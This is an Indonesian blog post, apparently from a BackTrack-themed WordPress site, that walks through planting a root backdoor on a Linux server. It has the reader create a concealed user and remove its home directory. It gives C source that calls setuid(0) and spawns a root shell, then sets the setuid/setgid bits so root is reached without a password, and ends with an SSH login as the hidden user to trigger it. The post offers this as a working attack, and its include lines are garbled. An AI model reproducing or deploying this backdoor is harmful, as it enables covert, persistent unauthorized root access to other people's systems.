Beranda » Back|Track » root backdooring

root backdooring

Start here

assalamu alaikum ::.

nah kita akan membahas sedikit tentang Backdoor sama dengan “pintu belakang” sama halnya dengan rumah kita.mempunyai pintu belakang. nah jika pintu depan kehilangan kunci maka biasanya kita lewat pintu belakang ato lebih krennya duplicate kunci…hehehe tp untuk saatnya bukan tentang rumah yg sy bahas tetapi backdoor dalam sistem keamanan komputer…:D

Jadi backdoor dalam keamanan komputer yaitu Mekanisme yang di gunakan untuk mengakses sistem,aplikasi ato jaringan selain dari mekanisme yg umum yg sering kita gunakan melalui proses LogIn ato proses Authentikasi lainnya…

nah to the point

disini sy mempunyai server sy ingin memasangkan backdoor(pintu belakang) pada server tersebut (dalam keadaan root (#));

step 1

buat user baru(new user: adduser,useradd) nah setelah buat user baru cek pada directory(/etc/passwd and /etc/shadow) tempatkan user baru tersebut pada tempat yg lebih aman (jangan lupa hapus directory user pada /home/newuser)

step2

buat file backdoornya pada /usr/bin
# touch door.c
# nano door.c
# pastekan code C di bawah


#include
#include
#include
int main()
{
system("echo ");
system("echo -==[ R00t Backd00r ]==-\r\n");
system("echo -==[ x.d.0.0.r ]==-\r\n");
system("echo -==[ Happy Hacking ]==-\r\n");
system("echo ");
system("echo Starting Interactive Shell...\r\n");
system("echo Session Started. Enjoy the hack !!");
system("echo ");
setuid(0);
setgid(0);
setgroups(0,0);
system("su");
system("exit");
return 0;
}

step 3

compile/build file C tersebut yg sudah di copas

# gcc -o xdoor door.c (xdoor nama command)
# chmod gu+s xdoor (-rwxr-s)
# chmod o+x xdoor

nah sy jelaskan sedikit tentang perintah/command pada “chmod”
untuk chmod gu+s (g = files grup u = owner (user) + = add permission s = setuid/gid(special mode selection)); sedangkan chmod o+x (o = all other + = add permission x = execute);
nah kenapa chmod yang pertama menggunakan ‘s’ (setuid/gid) karna untuk menghindari password root dalam arti tidak meminta password (root) setelah mengeksekusi xdoor tersebut.

step 4

remote server yang kita pasangkan backdoor

# ssh newUser@123.456.78.910
# newUser@123.456.78.910, password :
# Could not chdir to home directory /home/newUser: No such file or directory
# bash~$ xdoor (command yg di buat sebelumnya);

thanks for attention dudešŸ˜‰ GOODLUCK

links terkait


Tinggalkan Balasan

Please log in using one of these methods to post your comment:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s